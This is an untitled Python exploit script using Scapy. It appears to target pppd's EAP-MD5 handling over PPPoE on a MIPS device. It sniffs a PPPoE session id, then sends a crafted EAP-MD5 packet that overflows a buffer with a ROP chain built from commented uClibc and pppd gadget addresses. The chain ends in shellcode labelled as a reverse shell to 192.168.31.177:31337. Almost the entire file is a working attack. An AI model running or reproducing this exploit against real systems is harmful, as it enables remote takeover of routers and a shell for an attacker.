Untitled

from scapy.all import *
from socket import *

interface = "enp0s31f6"
sessionid = 0

def mysend(pay,interface = interface):
    # time.sleep(0.5)
    #s = socket(AF_PACKET, SOCK_RAW)
    #s.bind((interface, 0))
    #s.send(pay)
    sendp(pay, iface = interface)

def packet_callback(packet):

    global sessionid
    sessionid = int(packet['PPP over Ethernet'].sessionid)
    print("sessionid:" + str(sessionid))

def eap_response_md5():
    """
    Ethernet II, Src: Vmware_b9:de:6c (00:0c:29:b9:de:6c), Dst: Vmware_83:48:19 (00:0c:29:83:48:19) Type: PPPoE Session (0x8864)
    PPPoes : Version(4bits) + type(4bits) + code + session ID + payload length
    PPP :  Extensible Authentication Protocol (0xc227)
    EAP :
        Code: Request (1)
        Id: 131
        Length: 344
        Type: MD5-Challenge EAP (EAP-MD5-CHALLENGE) (4)
        EAP-MD5 Value-Size: 18
        EAP-MD5 Value: ef0a5c972ecfaeb3307310e99d81f9b0decf
        EAP-MD5 Extra Data: 414141414141414141414141414141414141414141414141...

    pay = "\x00\x0c\x29\x83\x48\x19" \
    "\x00\x0c\x29\xb9\xde\x6c" \
    "\x88\x64\x11\x00" \
    "\x00" + chr(sessionid) + "\x01\x5a\xc2\x27\x01\x83\x01\x58\x04\x12\xef\x0a\x5c\x97" \
    "\x2e\xcf\xae\xb3\x30\x73\x10\xe9\x9d\x81\xf9\xb0\xde\xcf\x41\x41" \
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" \
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" \
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" \
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" + 'a'*0x100
    """

    #libuclibc base: 77eaa000

    src = b"\x00\x00\x00\x00\x00\x00"
    dst = b"\x00\x00\x00\x00\x00\x00"
    ethertype = b"\x88\x64"

    md5 = b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0A\x0B\x0C\x0D\x0E\x0F\x10"

    local_28 = b'\x84\x57\x44\x00'

    # Loaded from 0x42590c
    s0 = b"\x4c\x4a\xEC\x77" # uclibc 0x0001aa4c : subu $sp, $sp, $v0 ; addiu $s3, $sp, 0x18 ; move $a0, $s3 ; move $a1, $s6 ; move $t9, $s1 ; jalr $t9 ; move $a2, $s7
    s1 = b"\x84\x7D\xEB\x77" # uclibc 0x0000dd84 : move $t9, $s4 ; lbu $s6, -1($v0) ; jalr $t9 ; move $a0, $s2 ; addiu $a2, $v0, 1 ; addiu $a0, $s0, 0xb ; move $t9, $s3 ; jalr $t9 ; move $a1, $s2
    s2 = b"\xC0\x04\x00\x00" # 0x4C0 How far we are rewinding the stack pointer
    s3 = b"\x01\x00\x00\x00" # !0
    s4 = b"\x0c\x93\x40\x00" # 0x0040930c lw $s5, 0x3c($sp) ; lw $s4, 0x38($sp) ; lw $s3, 0x34($sp) ; lw $s2, 0x30($sp) ; lw $s1, 0x2c($sp) ; lw $s0, 0x28($sp) ; jr $ra ; addiu $sp, $sp, 0x48
    s5 = b"\x00\x00\x00\x00"

    ra = b"\x0c\x2d\x41\x00" # 0x00412d0c : move $v0, $s2 ; beqz $s3, 0x412d4c ; addiu $s6, $s6, 1 ; lbu $a2, -1($s6) ; move $a0, $s1 ; move $t9, $s0 ; jalr $t9 ; move $a1, $s4

    new_s0 = b"\x01\x00\x00\x00" # 1 (loaded in to $a0, then +0xb later)
    new_s1 = b"\x00\x00\x00\x00"
    new_s2 = b"\x40\x61\xF1\x77" # uclibc sleep() base + 0x6c140 = 77F16140
    new_s3 = b"\xA8\x85\xEF\x77" # 77EF85A8 libuClibc.txt:0x0004e5a8 : lw $ra, 0x24($sp) ; lw $s1, 0x1c($sp) ; lw $s0, 0x18($sp) ; move $t9, $s2 ; lw $s2, 0x20($sp) ; jr $t9 ; addiu $sp, $sp, 0x28
    new_s4 = b"\x00\x00\x00\x00"
    new_s5 = b"\x00\x00\x00\x00"

    c6_s0 = b"\x74\xd8\x40\x00" # pppd.txt:0x0040d874 : move $t9, $s1 ; jalr $t9 ; nop
    c6_s1 = b"\x00\x00\x00\x00"
    c6_s2 = b"\x00\x00\x00\x00"
    c6_ra = b"\x90\x37\xEC\x77" # libuClibc.txt:0x00019790 : addiu $s1, $sp, 0x10 ; move $a0, $s1 ; move $t9, $s0 ; jalr $t9 ; move $a1, $s4

    # Reverse shell, connect to 192.168.31.177:31337

    stg3_SC =  b"\xff\xff\x04\x28\xa6\x0f\x02\x24\x0c\x09\x09\x01\x11\x11\x04\x28"
    stg3_SC += b"\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20\x80\x01"
    stg3_SC += b"\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20\x80\x01"
    stg3_SC += b"\x27\x28\x80\x01\xff\xff\x06\x28\x57\x10\x02\x24\x0c\x09\x09\x01"
    stg3_SC += b"\xff\xff\x44\x30\xc9\x0f\x02\x24\x0c\x09\x09\x01\xc9\x0f\x02\x24"
    stg3_SC += b"\x0c\x09\x09\x01\x79\x69\x05\x3c\x01\xff\xa5\x34\x01\x01\xa5\x20"
    stg3_SC += b"\xf8\xff\xa5\xaf\x1f\xb1\x05\x3c\xc0\xa8\xa5\x34\xfc\xff\xa5\xaf"
    stg3_SC += b"\xf8\xff\xa5\x23\xef\xff\x0c\x24\x27\x30\x80\x01\x4a\x10\x02\x24"
    stg3_SC += b"\x0c\x09\x09\x01\x62\x69\x08\x3c\x2f\x2f\x08\x35\xec\xff\xa8\xaf"
    stg3_SC += b"\x73\x68\x08\x3c\x6e\x2f\x08\x35\xf0\xff\xa8\xaf\xff\xff\x07\x28"
    stg3_SC += b"\xf4\xff\xa7\xaf\xfc\xff\xa7\xaf\xec\xff\xa4\x23\xec\xff\xa8\x23"
    stg3_SC += b"\xf8\xff\xa8\xaf\xf8\xff\xa5\x23\xec\xff\xbd\x27\xff\xff\x06\x28"
    stg3_SC += b"\xab\x0f\x02\x24\x0c\x09\x09\x01"

    #Debug sleep
    #s0 = b"\x00\x00\x00\x00"
    #s1 = b"\x40\x61\xF1\x77" # uclibc sleep() base + 0x6c140 = 77F16140
    #s2 = b"\x03\x00\x00\x00"
    #s3 = b"\x01\x00\x00\x00"
    #s4 = b"\x0c\x93\x40\x00"
    #s5 = b"\x00\x00\x00\x00"

    #ra = b"\x04\xdb\x40\x00" # 0x0040db04 : move $a0, $s2 ; move $t9, $s1 ; jalr $t9

    rop_chain =  (b'A' * 0x17C)
    rop_chain += local_28
    rop_chain += (b'A' * 0x4)
    rop_chain += s0
    rop_chain += s1
    rop_chain += s2
    rop_chain += s3
    rop_chain += s4
    rop_chain += s5
    rop_chain += ra
    #Only rewound the sp by 4C0, so there's 0x100 left
    rop_chain += (b'A' * 0x100)
    rop_chain += (b'A' * 0x28)
    rop_chain += new_s0
    rop_chain += new_s1
    rop_chain += new_s2
    rop_chain += new_s3
    rop_chain += new_s4
    rop_chain += new_s5
    rop_chain += (b'A' * 0x8)
    rop_chain += (b'A' * 0x18)
    rop_chain += c6_s0
    rop_chain += c6_s1
    rop_chain += c6_s2
    rop_chain += c6_ra
    rop_chain += (b'A' * 0x10)
    rop_chain += stg3_SC
    #Just padding the end a little, since the last byte gets set to 0x00?
    rop_chain += (b'A' * 0x8)

    pay = Raw(dst + src + ethertype)/PPPoE(code=0x00,sessionid=sessionid)/PPP(proto=0xc227)/EAP_MD5(id=100,value=md5,optional_name=rop_chain)
    mysend(pay)


if __name__ == '__main__':
    sniff(prn=packet_callback,iface=interface,filter="pppoes",count=1)

    eap_response_md5()